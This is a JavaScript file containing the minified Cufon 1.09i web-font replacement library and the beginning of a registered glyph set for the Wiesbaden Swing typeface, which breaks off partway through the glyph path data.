/*
 * Copyright (c) 2009 Simo Kinnunen.
 * Licensed under the MIT license.
 *
 * @version 1.09i
 */
var Cufon=(function(){var m=function(){return m.replace.apply(null,arguments)};var x=m.DOM={ready:(function(){var C=false,E={loaded:1,complete:1};var B=[],D=function(){if(C){return}C=true;for(var F;F=B.shift();F()){}};if(document.addEventListener){document.addEventListener("DOMContentLoaded",D,false);window.addEventListener("pageshow",D,false)}if(!window.opera&&document.readyState){(function(){E[document.readyState]?D():setTimeout(arguments.callee,10)})()}if(document.readyState&&document.createStyleSheet){(function(){try{document.body.doScroll("left");D()}catch(F){setTimeout(arguments.callee,1)}})()}q(window,"load",D);return function(F){if(!arguments.length){D()}else{C?F():B.push(F)}}})(),root:function(){return document.documentElement||document.body}};var n=m.CSS={Size:function(C,B){this.value=parseFloat(C);this.unit=String(C).match(/[a-z%]*$/)[0]||"px";this.convert=function(D){return D/B*this.value};this.convertFrom=function(D){return D/this.value*B};this.toString=function(){return this.value+this.unit}},addClass:function(C,B){var D=C.className;C.className=D+(D&&" ")+B;return C},color:j(function(C){var B={};B.color=C.replace(/^rgba\((.*?),\s*([\d.]+)\)/,function(E,D,F){B.opacity=parseFloat(F);return"rgb("+D+")"});return B}),fontStretch:j(function(B){if(typeof B=="number"){return B}if(/%$/.test(B)){return parseFloat(B)/100}return{"ultra-condensed":0.5,"extra-condensed":0.625,condensed:0.75,"semi-condensed":0.875,"semi-expanded":1.125,expanded:1.25,"extra-expanded":1.5,"ultra-expanded":2}[B]||1}),getStyle:function(C){var B=document.defaultView;if(B&&B.getComputedStyle){return new a(B.getComputedStyle(C,null))}if(C.currentStyle){return new a(C.currentStyle)}return new a(C.style)},gradient:j(function(F){var G={id:F,type:F.match(/^-([a-z]+)-gradient\(/)[1],stops:[]},C=F.substr(F.indexOf("(")).match(/([\d.]+=)?(#[a-f0-9]+|[a-z]+\(.*?\)|[a-z]+)/ig);for(var E=0,B=C.length,D;E<B;++E){D=C[E].split("=",2).reverse();G.stops.push([D[1]||E/(B-1),D[0]])}return G}),quotedList:j(function(E){var D=[],C=/\s*((["'])([\s\S]*?[^\\])\2|[^,]+)\s*/g,B;while(B=C.exec(E)){D.push(B[3]||B[1])}return D}),recognizesMedia:j(function(G){var E=document.createElement("style"),D,C,B;E.type="text/css";E.media=G;try{E.appendChild(document.createTextNode("/**/"))}catch(F){}C=g("head")[0];C.insertBefore(E,C.firstChild);D=(E.sheet||E.styleSheet);B=D&&!D.disabled;C.removeChild(E);return B}),removeClass:function(D,C){var B=RegExp("(?:^|\\s+)"+C+"(?=\\s|$)","g");D.className=D.className.replace(B,"");return D},supports:function(D,C){var B=document.createElement("span").style;if(B[D]===undefined){return false}B[D]=C;return B[D]===C},textAlign:function(E,D,B,C){if(D.get("textAlign")=="right"){if(B>0){E=" "+E}}else{if(B<C-1){E+=" "}}return E},textShadow:j(function(F){if(F=="none"){return null}var E=[],G={},B,C=0;var D=/(#[a-f0-9]+|[a-z]+\(.*?\)|[a-z]+)|(-?[\d.]+[a-z%]*)|,/ig;while(B=D.exec(F)){if(B[0]==","){E.push(G);G={};C=0}else{if(B[1]){G.color=B[1]}else{G[["offX","offY","blur"][C++]]=B[2]}}}E.push(G);return E}),textTransform:(function(){var B={uppercase:function(C){return C.toUpperCase()},lowercase:function(C){return C.toLowerCase()},capitalize:function(C){return C.replace(/\b./g,function(D){return D.toUpperCase()})}};return function(E,D){var C=B[D.get("textTransform")];return C?C(E):E}})(),whiteSpace:(function(){var D={inline:1,"inline-block":1,"run-in":1};var C=/^\s+/,B=/\s+$/;return function(H,F,G,E){if(E){if(E.nodeName.toLowerCase()=="br"){H=H.replace(C,"")}}if(D[F.get("display")]){return H}if(!G.previousSibling){H=H.replace(C,"")}if(!G.nextSibling){H=H.replace(B,"")}return H}})()};n.ready=(function(){var B=!n.recognizesMedia("all"),E=false;var D=[],H=function(){B=true;for(var K;K=D.shift();K()){}};var I=g("link"),J=g("style");function C(K){return K.disabled||G(K.sheet,K.media||"screen")}function G(M,P){if(!n.recognizesMedia(P||"all")){return true}if(!M||M.disabled){return false}try{var Q=M.cssRules,O;if(Q){search:for(var L=0,K=Q.length;O=Q[L],L<K;++L){switch(O.type){case 2:break;case 3:if(!G(O.styleSheet,O.media.mediaText)){return false}break;default:break search}}}}catch(N){}return true}function F(){if(document.createStyleSheet){return true}var L,K;for(K=0;L=I[K];++K){if(L.rel.toLowerCase()=="stylesheet"&&!C(L)){return false}}for(K=0;L=J[K];++K){if(!C(L)){return false}}return true}x.ready(function(){if(!E){E=n.getStyle(document.body).isUsable()}if(B||(E&&F())){H()}else{setTimeout(arguments.callee,10)}});return function(K){if(B){K()}else{D.push(K)}}})();function s(D){var C=this.face=D.face,B={"\u0020":1,"\u00a0":1,"\u3000":1};this.glyphs=D.glyphs;this.w=D.w;this.baseSize=parseInt(C["units-per-em"],10);this.family=C["font-family"].toLowerCase();this.weight=C["font-weight"];this.style=C["font-style"]||"normal";this.viewBox=(function(){var F=C.bbox.split(/\s+/);var E={minX:parseInt(F[0],10),minY:parseInt(F[1],10),maxX:parseInt(F[2],10),maxY:parseInt(F[3],10)};E.width=E.maxX-E.minX;E.height=E.maxY-E.minY;E.toString=function(){return[this.minX,this.minY,this.width,this.height].join(" ")};return E})();this.ascent=-parseInt(C.ascent,10);this.descent=-parseInt(C.descent,10);this.height=-this.ascent+this.descent;this.spacing=function(L,N,E){var O=this.glyphs,M,K,G,P=[],F=0,J=-1,I=-1,H;while(H=L[++J]){M=O[H]||this.missingGlyph;if(!M){continue}if(K){F-=G=K[H]||0;P[I]-=G}F+=P[++I]=~~(M.w||this.w)+N+(B[H]?E:0);K=M.k}P.total=F;return P}}function f(){var C={},B={oblique:"italic",italic:"oblique"};this.add=function(D){(C[D.style]||(C[D.style]={}))[D.weight]=D};this.get=function(H,I){var G=C[H]||C[B[H]]||C.normal||C.italic||C.oblique;if(!G){return null}I={normal:400,bold:700}[I]||parseInt(I,10);if(G[I]){return G[I]}var E={1:1,99:0}[I%100],K=[],F,D;if(E===undefined){E=I>400}if(I==500){I=400}for(var J in G){if(!k(G,J)){continue}J=parseInt(J,10);if(!F||J<F){F=J}if(!D||J>D){D=J}K.push(J)}if(I<F){I=F}if(I>D){I=D}K.sort(function(M,L){return(E?(M>=I&&L>=I)?M<L:M>L:(M<=I&&L<=I)?M>L:M<L)?-1:1});return G[K[0]]}}function r(){function D(F,G){if(F.contains){return F.contains(G)}return F.compareDocumentPosition(G)&16}function B(G){var F=G.relatedTarget;if(!F||D(this,F)){return}C(this,G.type=="mouseover")}function E(F){C(this,F.type=="mouseenter")}function C(F,G){setTimeout(function(){var H=d.get(F).options;m.replace(F,G?h(H,H.hover):H,true)},10)}this.attach=function(F){if(F.onmouseenter===undefined){q(F,"mouseover",B);q(F,"mouseout",B)}else{q(F,"mouseenter",E);q(F,"mouseleave",E)}}}function u(){var C=[],D={};function B(H){var E=[],G;for(var F=0;G=H[F];++F){E[F]=C[D[G]]}return E}this.add=function(F,E){D[F]=C.push(E)-1};this.repeat=function(){var E=arguments.length?B(arguments):C,F;for(var G=0;F=E[G++];){m.replace(F[0],F[1],true)}}}function A(){var D={},B=0;function C(E){return E.cufid||(E.cufid=++B)}this.get=function(E){var F=C(E);return D[F]||(D[F]={})}}function a(B){var D={},C={};this.extend=function(E){for(var F in E){if(k(E,F)){D[F]=E[F]}}return this};this.get=function(E){return D[E]!=undefined?D[E]:B[E]};this.getSize=function(F,E){return C[F]||(C[F]=new n.Size(this.get(F),E))};this.isUsable=function(){return !!B}}function q(C,B,D){if(C.addEventListener){C.addEventListener(B,D,false)}else{if(C.attachEvent){C.attachEvent("on"+B,function(){return D.call(C,window.event)})}}}function v(C,B){var D=d.get(C);if(D.options){return C}if(B.hover&&B.hoverables[C.nodeName.toLowerCase()]){b.attach(C)}D.options=B;return C}function j(B){var C={};return function(D){if(!k(C,D)){C[D]=B.apply(null,arguments)}return C[D]}}function c(F,E){var B=n.quotedList(E.get("fontFamily").toLowerCase()),D;for(var C=0;D=B[C];++C){if(i[D]){return i[D].get(E.get("fontStyle"),E.get("fontWeight"))}}return null}function g(B){return document.getElementsByTagName(B)}function k(C,B){return C.hasOwnProperty(B)}function h(){var C={},B,F;for(var E=0,D=arguments.length;B=arguments[E],E<D;++E){for(F in B){if(k(B,F)){C[F]=B[F]}}}return C}function o(E,M,C,N,F,D){var K=document.createDocumentFragment(),H;if(M===""){return K}var L=N.separate;var I=M.split(p[L]),B=(L=="words");if(B&&t){if(/^\s/.test(M)){I.unshift("")}if(/\s$/.test(M)){I.push("")}}for(var J=0,G=I.length;J<G;++J){H=z[N.engine](E,B?n.textAlign(I[J],C,J,G):I[J],C,N,F,D,J<G-1);if(H){K.appendChild(H)}}return K}function l(D,M){var C=D.nodeName.toLowerCase();if(M.ignore[C]){return}var E=!M.textless[C];var B=n.getStyle(v(D,M)).extend(M);var F=c(D,B),G,K,I,H,L,J;if(!F){return}for(G=D.firstChild;G;G=I){K=G.nodeType;I=G.nextSibling;if(E&&K==3){if(H){H.appendData(G.data);D.removeChild(G)}else{H=G}if(I){continue}}if(H){D.replaceChild(o(F,n.whiteSpace(H.data,B,H,J),B,M,G,D),H);H=null}if(K==1){if(G.firstChild){if(G.nodeName.toLowerCase()=="cufon"){z[M.engine](F,null,B,M,G,D)}else{arguments.callee(G,M)}}J=G}}}var t=" ".split(/\s+/).length==0;var d=new A();var b=new r();var y=new u();var e=false;var z={},i={},w={autoDetect:false,engine:null,forceHitArea:false,hover:false,hoverables:{a:true},ignore:{applet:1,canvas:1,col:1,colgroup:1,head:1,iframe:1,map:1,optgroup:1,option:1,script:1,select:1,style:1,textarea:1,title:1,pre:1},printable:true,selector:(window.Sizzle||(window.jQuery&&function(B){return jQuery(B)})||(window.dojo&&dojo.query)||(window.Ext&&Ext.query)||(window.YAHOO&&YAHOO.util&&YAHOO.util.Selector&&YAHOO.util.Selector.query)||(window.$$&&function(B){return $$(B)})||(window.$&&function(B){return $(B)})||(document.querySelectorAll&&function(B){return document.querySelectorAll(B)})||g),separate:"words",textless:{dl:1,html:1,ol:1,table:1,tbody:1,thead:1,tfoot:1,tr:1,ul:1},textShadow:"none"};var p={words:/\s/.test("\u00a0")?/[^\S\u00a0]+/:/\s+/,characters:"",none:/^/};m.now=function(){x.ready();return m};m.refresh=function(){y.repeat.apply(y,arguments);return m};m.registerEngine=function(C,B){if(!B){return m}z[C]=B;return m.set("engine",C)};m.registerFont=function(D){if(!D){return m}var B=new s(D),C=B.family;if(!i[C]){i[C]=new f()}i[C].add(B);return m.set("fontFamily",'"'+C+'"')};m.replace=function(D,C,B){C=h(w,C);if(!C.engine){return m}if(!e){n.addClass(x.root(),"cufon-active cufon-loading");n.ready(function(){n.addClass(n.removeClass(x.root(),"cufon-loading"),"cufon-ready")});e=true}if(C.hover){C.forceHitArea=true}if(C.autoDetect){delete C.fontFamily}if(typeof C.textShadow=="string"){C.textShadow=n.textShadow(C.textShadow)}if(typeof C.color=="string"&&/^-/.test(C.color)){C.textGradient=n.gradient(C.color)}else{delete C.textGradient}if(!B){y.add(D,arguments)}if(D.nodeType||typeof D=="string"){D=[D]}n.ready(function(){for(var F=0,E=D.length;F<E;++F){var G=D[F];if(typeof G=="string"){m.replace(C.selector(G),C,true)}else{l(G,C)}}});return m};m.set=function(B,C){w[B]=C;return m};return m})();Cufon.registerEngine("vml",(function(){var e=document.namespaces;if(!e){return}e.add("cvml","urn:schemas-microsoft-com:vml");e=null;var b=document.createElement("cvml:shape");b.style.behavior="url(#default#VML)";if(!b.coordsize){return}b=null;var h=(document.documentMode||0)<8;document.write(('<style type="text/css">cufoncanvas{text-indent:0;}@media screen{cvml\\:shape,cvml\\:rect,cvml\\:fill,cvml\\:shadow{behavior:url(#default#VML);display:block;antialias:true;position:absolute;}cufoncanvas{position:absolute;text-align:left;}cufon{display:inline-block;position:relative;vertical-align:'+(h?"middle":"text-bottom")+";}cufon cufontext{position:absolute;left:-10000in;font-size:1px;}a cufon{cursor:pointer}}@media print{cufon cufoncanvas{display:none;}}</style>").replace(/;/g,"!important;"));function c(i,j){return a(i,/(?:em|ex|%)$|^[a-z-]+$/i.test(j)?"1em":j)}function a(l,m){if(m==="0"){return 0}if(/px$/i.test(m)){return parseFloat(m)}var k=l.style.left,j=l.runtimeStyle.left;l.runtimeStyle.left=l.currentStyle.left;l.style.left=m.replace("%","em");var i=l.style.pixelLeft;l.style.left=k;l.runtimeStyle.left=j;return i}function f(l,k,j,n){var i="computed"+n,m=k[i];if(isNaN(m)){m=k.get(n);k[i]=m=(m=="normal")?0:~~j.convertFrom(a(l,m))}return m}var g={};function d(p){var q=p.id;if(!g[q]){var n=p.stops,o=document.createElement("cvml:fill"),i=[];o.type="gradient";o.angle=180;o.focus="0";o.method="sigma";o.color=n[0][1];for(var m=1,l=n.length-1;m<l;++m){i.push(n[m][0]*100+"% "+n[m][1])}o.colors=i.join(",");o.color2=n[l][1];g[q]=o}return g[q]}return function(ac,G,Y,C,K,ad,W){var n=(G===null);if(n){G=K.alt}var I=ac.viewBox;var p=Y.computedFontSize||(Y.computedFontSize=new Cufon.CSS.Size(c(ad,Y.get("fontSize"))+"px",ac.baseSize));var y,q;if(n){y=K;q=K.firstChild}else{y=document.createElement("cufon");y.className="cufon cufon-vml";y.alt=G;q=document.createElement("cufoncanvas");y.appendChild(q);if(C.printable){var Z=document.createElement("cufontext");Z.appendChild(document.createTextNode(G));y.appendChild(Z)}if(!W){y.appendChild(document.createElement("cvml:shape"))}}var ai=y.style;var R=q.style;var l=p.convert(I.height),af=Math.ceil(l);var V=af/l;var P=V*Cufon.CSS.fontStretch(Y.get("fontStretch"));var U=I.minX,T=I.minY;R.height=af;R.top=Math.round(p.convert(T-ac.ascent));R.left=Math.round(p.convert(U));ai.height=p.convert(ac.height)+"px";var F=Y.get("color");var ag=Cufon.CSS.textTransform(G,Y).split("");var L=ac.spacing(ag,f(ad,Y,p,"letterSpacing"),f(ad,Y,p,"wordSpacing"));if(!L.length){return null}var k=L.total;var x=-U+k+(I.width-L[L.length-1]);var ah=p.convert(x*P),X=Math.round(ah);var O=x+","+I.height,m;var J="r"+O+"ns";var u=C.textGradient&&d(C.textGradient);var o=ac.glyphs,S=0;var H=C.textShadow;var ab=-1,aa=0,w;while(w=ag[++ab]){var D=o[ag[ab]]||ac.missingGlyph,v;if(!D){continue}if(n){v=q.childNodes[aa];while(v.firstChild){v.removeChild(v.firstChild)}}else{v=document.createElement("cvml:shape");q.appendChild(v)}v.stroked="f";v.coordsize=O;v.coordorigin=m=(U-S)+","+T;v.path=(D.d?"m"+D.d+"xe":"")+"m"+m+J;v.fillcolor=F;if(u){v.appendChild(u.cloneNode(false))}var ae=v.style;ae.width=X;ae.height=af;if(H){var s=H[0],r=H[1];var B=Cufon.CSS.color(s.color),z;var N=document.createElement("cvml:shadow");N.on="t";N.color=B.color;N.offset=s.offX+","+s.offY;if(r){z=Cufon.CSS.color(r.color);N.type="double";N.color2=z.color;N.offset2=r.offX+","+r.offY}N.opacity=B.opacity||(z&&z.opacity)||1;v.appendChild(N)}S+=L[aa++]}var M=v.nextSibling,t,A;if(C.forceHitArea){if(!M){M=document.createElement("cvml:rect");M.stroked="f";M.className="cufon-vml-cover";t=document.createElement("cvml:fill");t.opacity=0;M.appendChild(t);q.appendChild(M)}A=M.style;A.width=X;A.height=af}else{if(M){q.removeChild(M)}}ai.width=Math.max(Math.ceil(p.convert(k*P)),0);if(h){var Q=Y.computedYAdjust;if(Q===undefined){var E=Y.get("lineHeight");if(E=="normal"){E="1em"}else{if(!isNaN(E)){E+="em"}}Y.computedYAdjust=Q=0.5*(a(ad,E)-parseFloat(ai.height))}if(Q){ai.marginTop=Math.ceil(Q)+"px";ai.marginBottom=Q+"px"}}return y}})());Cufon.registerEngine("canvas",(function(){var b=document.createElement("canvas");if(!b||!b.getContext||!b.getContext.apply){return}b=null;var a=Cufon.CSS.supports("display","inline-block");var e=!a&&(document.compatMode=="BackCompat"||/frameset|transitional/i.test(document.doctype.publicId));var f=document.createElement("style");f.type="text/css";f.appendChild(document.createTextNode(("cufon{text-indent:0;}@media screen,projection{cufon{display:inline;display:inline-block;position:relative;vertical-align:middle;"+(e?"":"font-size:1px;line-height:1px;")+"}cufon cufontext{display:-moz-inline-box;display:inline-block;width:0;height:0;overflow:hidden;text-indent:-10000in;}"+(a?"cufon canvas{position:relative;}":"cufon canvas{position:absolute;}")+"}@media print{cufon{padding:0;}cufon canvas{display:none;}}").replace(/;/g,"!important;")));document.getElementsByTagName("head")[0].appendChild(f);function d(p,h){var n=0,m=0;var g=[],o=/([mrvxe])([^a-z]*)/g,k;generate:for(var j=0;k=o.exec(p);++j){var l=k[2].split(",");switch(k[1]){case"v":g[j]={m:"bezierCurveTo",a:[n+~~l[0],m+~~l[1],n+~~l[2],m+~~l[3],n+=~~l[4],m+=~~l[5]]};break;case"r":g[j]={m:"lineTo",a:[n+=~~l[0],m+=~~l[1]]};break;case"m":g[j]={m:"moveTo",a:[n=~~l[0],m=~~l[1]]};break;case"x":g[j]={m:"closePath"};break;case"e":break generate}h[g[j].m].apply(h,g[j].a)}return g}function c(m,k){for(var j=0,h=m.length;j<h;++j){var g=m[j];k[g.m].apply(k,g.a)}}return function(V,w,P,t,C,W){var k=(w===null);if(k){w=C.getAttribute("alt")}var A=V.viewBox;var m=P.getSize("fontSize",V.baseSize);var B=0,O=0,N=0,u=0;var z=t.textShadow,L=[];if(z){for(var U=z.length;U--;){var F=z[U];var K=m.convertFrom(parseFloat(F.offX));var I=m.convertFrom(parseFloat(F.offY));L[U]=[K,I];if(I<B){B=I}if(K>O){O=K}if(I>N){N=I}if(K<u){u=K}}}var Z=Cufon.CSS.textTransform(w,P).split("");var E=V.spacing(Z,~~m.convertFrom(parseFloat(P.get("letterSpacing"))||0),~~m.convertFrom(parseFloat(P.get("wordSpacing"))||0));if(!E.length){return null}var h=E.total;O+=A.width-E[E.length-1];u+=A.minX;var s,n;if(k){s=C;n=C.firstChild}else{s=document.createElement("cufon");s.className="cufon cufon-canvas";s.setAttribute("alt",w);n=document.createElement("canvas");s.appendChild(n);if(t.printable){var S=document.createElement("cufontext");S.appendChild(document.createTextNode(w));s.appendChild(S)}}var aa=s.style;var H=n.style;var j=m.convert(A.height);var Y=Math.ceil(j);var M=Y/j;var G=M*Cufon.CSS.fontStretch(P.get("fontStretch"));var J=h*G;var Q=Math.ceil(m.convert(J+O-u));var o=Math.ceil(m.convert(A.height-B+N));n.width=Q;n.height=o;H.width=Q+"px";H.height=o+"px";B+=A.minY;H.top=Math.round(m.convert(B-V.ascent))+"px";H.left=Math.round(m.convert(u))+"px";var r=Math.max(Math.ceil(m.convert(J)),0)+"px";if(a){aa.width=r;aa.height=m.convert(V.height)+"px"}else{aa.paddingLeft=r;aa.paddingBottom=(m.convert(V.height)-1)+"px"}var X=n.getContext("2d"),D=j/A.height;X.scale(D,D*M);X.translate(-u,-B);X.save();function T(){var x=V.glyphs,ab,l=-1,g=-1,y;X.scale(G,1);while(y=Z[++l]){var ab=x[Z[l]]||V.missingGlyph;if(!ab){continue}if(ab.d){X.beginPath();if(ab.code){c(ab.code,X)}else{ab.code=d("m"+ab.d,X)}X.fill()}X.translate(E[++g],0)}X.restore()}if(z){for(var U=z.length;U--;){var F=z[U];X.save();X.fillStyle=F.color;X.translate.apply(X,L[U]);T()}}var q=t.textGradient;if(q){var v=q.stops,p=X.createLinearGradient(0,A.minY,0,A.maxY);for(var U=0,R=v.length;U<R;++U){p.addColorStop.apply(p,v[U])}X.fillStyle=p}else{X.fillStyle=P.get("color")}T();return s}})());


/*!
 * The following copyright notice may not be removed under any circumstances.
 * 
 * Copyright:
 * © 1992, 1994, 2002 Adobe Systems Incorporated. All rights reserved.
 * 
 * Trademark:
 * Wiesbaden Swing is a trademark of Linotype GmbH and may be registered in
 * certain jurisdictions.
 * 
 * Full name:
 * WiesbadenSwingLTStd-Roman
 * 
 * Designer:
 * Rosemarie Kloos-Rau
 * 
 * Vendor URL:
 * http://www.adobe.com/type
 * 
 * License information:
 * http://www.adobe.com/type/legal.html
 */

Cufon.registerFont((function(f){var b=_cufon_bridge_={p:[{"d":"24,77r0,-360r12,0r0,360r-12,0","w":60},{"d":"21,-28v-2,-17,-14,-66,7,-71v9,4,-2,17,1,28v0,37,7,65,16,65v10,0,23,-32,23,-56v0,-15,-10,-3,-11,-13v8,-13,22,-14,21,12v0,21,-11,67,-34,67v-17,0,-21,-23,-23,-32","w":93,"k":{",":14,".":14}},{"d":"24,-80v1,20,-3,74,20,75v2,0,1,1,1,2v0,2,-4,4,-8,4v-28,-1,-22,-80,-24,-106v0,-10,-2,-56,18,-39v-4,18,-8,46,-7,64","w":46},{"d":"90,-10v5,1,9,-10,13,-3v0,4,-8,11,-16,11v-17,0,-28,-33,-29,-66v-15,35,-18,40,-28,69v-5,14,-11,15,-17,9v0,-15,9,-145,11,-156v2,-4,14,-9,15,-4r-15,144v11,-16,25,-95,45,-85v1,34,0,63,21,81","w":100},{"d":"23,-7v0,-12,20,-14,20,0v0,6,-5,10,-10,10v-6,0,-10,-4,-10,-10xm41,-80v5,0,9,4,9,10v0,5,-4,10,-9,10v-6,0,-10,-5,-10,-10v0,-6,4,-10,10,-10","w":79,"k":{" ":7}},{"d":"23,63v7,-12,20,17,33,12v38,-16,13,-77,27,-115v-10,8,-20,7,-23,-13r16,-110v0,-13,-9,-17,-16,-17v-5,0,-27,2,-35,37v-1,6,-1,8,-4,8v-14,-22,15,-56,41,-55v51,2,7,102,10,136v0,3,0,8,4,8v3,3,21,-20,23,-7v-22,38,12,137,-44,137v-15,0,-32,-13,-32,-21"},{"d":"31,-10v21,-15,48,-45,38,-78v0,-6,14,-12,15,-5v-1,25,-7,79,13,82v0,2,-4,9,-9,9v-10,0,-12,-14,-15,-40v-16,20,-26,36,-47,45v-23,-3,-2,-60,-7,-80v1,-10,13,-15,17,-8v-6,17,-7,40,-8,70v0,2,0,5,3,5","w":106},{"d":"29,-8v14,0,29,-25,40,-34v1,0,3,0,3,3v0,4,-22,41,-45,41v-15,0,-20,-12,-20,-27v0,-34,28,-73,47,-73v5,0,9,2,9,6v0,5,-10,16,-13,10v0,-1,4,-7,1,-7v-7,0,-32,30,-32,62v0,5,1,19,10,19","w":73},{"d":"60,-155v17,-8,49,-7,49,13v0,15,-13,26,-33,45v10,35,16,62,16,80v0,13,-3,28,-17,28v-18,0,-59,-48,-60,-60v2,-14,40,-42,48,-50r-20,-67v9,-14,14,4,17,11xm28,-50v6,16,32,45,48,51v14,-13,-4,-68,-10,-90v-3,3,-37,27,-38,39xm62,-146v3,9,8,27,11,39v12,-10,41,-39,10,-45v-3,0,-10,1,-21,6"},{"d":"14,-60v-2,-14,3,-41,17,-29v-6,21,-14,81,10,86v0,4,-7,7,-11,7v-21,-6,-13,-43,-16,-64xm28,-147v8,6,-4,21,2,31v-10,5,-13,8,-13,-23v0,-4,3,-8,11,-8","w":53},{"d":"114,-88v29,70,48,105,86,78v2,0,3,1,3,2v0,3,-8,17,-26,17v-40,0,-64,-67,-73,-91v-18,10,-43,25,-49,33v-26,37,-30,55,-56,66v-9,1,-8,-5,-3,-8v57,-54,82,-132,81,-158v1,-2,5,-4,8,-5v-8,-11,0,-33,10,-23v0,10,7,45,17,81v31,-13,57,-28,67,-17v0,4,-3,4,-9,5v-25,5,-48,16,-56,20xm101,-91v-5,-15,-7,-26,-12,-49v-3,15,-13,47,-26,73v10,-7,16,-10,38,-24","w":200},{"d":"107,-143v-33,1,-58,25,-74,37v-2,0,-5,-3,-5,-5v0,-4,40,-42,81,-42v17,0,27,8,27,18v0,15,-32,35,-56,45v37,-1,74,21,74,52v0,32,-37,46,-66,46v-55,0,-78,-47,-78,-58v0,-8,9,-13,12,-7v-8,15,15,56,65,56v32,0,54,-16,54,-38v-1,-37,-55,-51,-90,-36v-1,0,-6,-7,-6,-8v25,-13,79,-35,78,-52v0,-5,-6,-8,-16,-8","w":159},{"d":"53,68v47,0,23,-105,19,-128v-7,20,-25,69,-40,69v-23,0,-12,-68,-15,-75v-3,-7,9,-16,14,-11v-2,22,-6,60,2,76v5,-3,47,-74,27,-95v-9,-6,-1,-14,6,-15v15,9,30,108,27,115v0,40,-10,72,-41,72v-32,0,-72,-37,-58,-56v3,0,3,1,5,7v6,20,32,41,54,41","w":106},{"d":"39,-94v20,-1,47,6,47,41v0,22,-17,54,-45,54v-22,0,-33,-22,-33,-45v0,-27,16,-50,31,-50xm46,-85v-2,9,-8,9,-13,4v-24,6,-12,78,12,71v13,0,30,-16,30,-38v0,-21,-12,-39,-29,-37","w":93,"k":{",":14,".":14}},{"d":"5,43v9,8,33,39,45,32v54,0,29,-110,25,-129v-10,22,-48,56,-60,56v-3,0,-8,-2,-8,-7v0,-27,40,-93,53,-88v-6,-10,2,-12,8,-14v36,59,45,191,-18,191v-30,0,-58,-34,-45,-41xm19,-13v7,4,71,-49,44,-71v-13,0,-44,58,-44,71","w":106},{"d":"161,-85v-7,14,-27,76,-51,85v-8,0,-9,-5,-10,-23v-1,-20,-6,-107,-7,-125v-26,0,-74,14,-74,29v0,8,12,4,11,11v0,3,-2,6,-7,6v-7,0,-14,-6,-14,-15v0,-25,47,-36,82,-42v-5,-8,9,-11,12,-11v11,36,-1,125,11,156v15,-18,25,-40,43,-91v-1,-5,-6,-17,-10,-24v0,-3,12,-7,13,-7v15,15,18,101,17,98v0,8,0,45,-12,77v-10,27,-26,36,-44,36v-42,0,-67,-49,-71,-93v-1,-6,13,-11,15,-4v-7,45,25,88,57,88v42,0,45,-82,45,-98v0,-30,-4,-45,-6,-53","w":193},{"d":"191,-171v8,30,-7,143,33,165v0,1,-5,11,-10,11v-22,-5,-30,-68,-31,-101v-6,13,-43,122,-81,122v-10,0,-12,-7,-12,-21v1,-44,9,-111,13,-154v-36,1,-86,12,-86,40v0,19,27,16,10,28v-7,0,-19,-11,-19,-26v1,-40,61,-49,95,-52v-3,-13,10,-22,17,-15v0,1,-2,13,-2,16v-8,60,-16,121,-16,158v0,13,1,15,4,15v16,0,76,-118,76,-137v0,0,-17,-52,9,-49","w":226},{"d":"5,-4v10,-22,22,-63,19,-68v0,-3,0,-3,3,-4v17,-5,31,15,50,23v10,-10,25,-24,29,-29v-7,4,-37,-1,-19,-7v15,-1,17,-1,27,-2v18,-21,26,-31,35,-45v2,-3,3,-5,12,-5v4,0,7,1,7,3v0,4,-34,40,-39,46r48,-5v2,0,4,1,4,4v-7,13,-61,6,-60,9r-35,37v15,9,72,49,109,35v1,0,15,1,15,5v-39,22,-101,-10,-133,-32v-38,33,-58,43,-62,43v-4,0,-10,-5,-10,-8xm18,-7v6,-3,38,-27,50,-38v-3,-1,-26,-17,-32,-21v-5,28,-14,50,-18,59xm57,-120v5,-33,26,-42,70,-43v24,0,66,3,40,15v-35,-19,-114,-4,-92,41v-7,7,-20,0,-18,-13","w":206},{"d":"28,-92v2,-21,-11,-88,19,-77v-5,26,-8,64,-7,88v19,-13,57,-58,76,-93v2,-1,12,-4,15,0v0,1,-39,63,-78,96v46,46,80,75,115,73v3,0,3,2,3,3v0,4,-6,6,-14,6v-42,-3,-85,-49,-114,-75r-3,2v2,15,-2,76,18,79v5,2,-1,12,-5,12v-21,-6,-28,-75,-25,-114","w":166},{"d":"27,-77r43,-107r13,0r43,107r-12,0r-37,-93r-37,93r-13,0","w":153},{"d":"80,-29v5,15,-37,34,-42,31v-22,0,-26,-22,-26,-34v0,-25,12,-70,37,-70v5,0,11,3,11,13v0,16,-14,40,-36,54v-1,12,3,27,16,27v16,0,27,-16,40,-21xm24,-46v14,-12,33,-35,22,-45v-9,0,-19,28,-22,45","w":79},{"d":"100,1v-31,-1,-45,4,-65,13v-4,-3,-16,-10,-3,-11v-15,-38,6,-148,12,-171v18,-9,65,-19,81,-2v-7,12,-16,-3,-31,0v-4,0,-22,0,-38,8v-5,18,-27,118,-12,161v30,-8,46,-9,70,-2v0,4,-1,4,-14,4"},{"d":"0,45r0,-18r180,0r0,18r-180,0","w":180},{"d":"113,-49v-8,3,-71,-23,-72,-19v-9,0,-19,7,-22,22r-9,0v15,-68,61,-15,103,-14v3,0,18,0,22,-21r9,0v-5,32,-27,32,-31,32","w":153},{"d":"59,1v50,-7,44,-62,40,-124v-21,26,-45,55,-69,55v-8,0,-11,-5,-11,-10v14,-34,32,-65,70,-79v-7,-7,2,-15,10,-14v11,16,14,43,14,81v0,27,-3,101,-56,101v-39,0,-61,-40,-39,-50v6,13,14,44,41,40xm95,-141v0,-3,-2,-6,-6,-6v-16,2,-68,56,-53,68v15,0,59,-45,59,-62","w":126},{"d":"76,-148v0,-14,9,-16,16,-12v-7,28,-3,114,2,130v4,15,6,24,16,26v0,2,-3,7,-8,7v-21,-3,-19,-53,-23,-66v-14,31,-48,66,-63,66v-5,0,-8,-5,-8,-10v2,-29,40,-96,70,-85v-1,-19,-2,-37,-2,-56xm69,-84v-14,1,-59,58,-48,76v9,-2,67,-59,48,-76","w":113},{"d":"16,-145v4,1,45,24,29,30v-10,-9,-25,-14,-33,-26v0,-3,2,-4,4,-4","w":53},{"w":66,"k":{"T":21,"V":27,"Y":14}},{"d":"17,-73v0,-36,-7,-96,21,-83v-8,25,-12,64,-12,88v12,-19,30,-32,45,-32v12,0,18,9,18,23v0,27,-30,81,-47,81v-9,0,-25,-13,-25,-77xm67,-89v-23,0,-38,31,-38,44v0,11,5,37,15,37v12,0,35,-47,35,-68v0,-8,-4,-13,-12,-13","w":100,"k":{",":14,".":14}},{"d":"10,-106v16,-26,130,-106,186,-70v0,4,-12,22,-14,10v-1,-4,-3,-9,-15,-9v-24,0,-55,9,-73,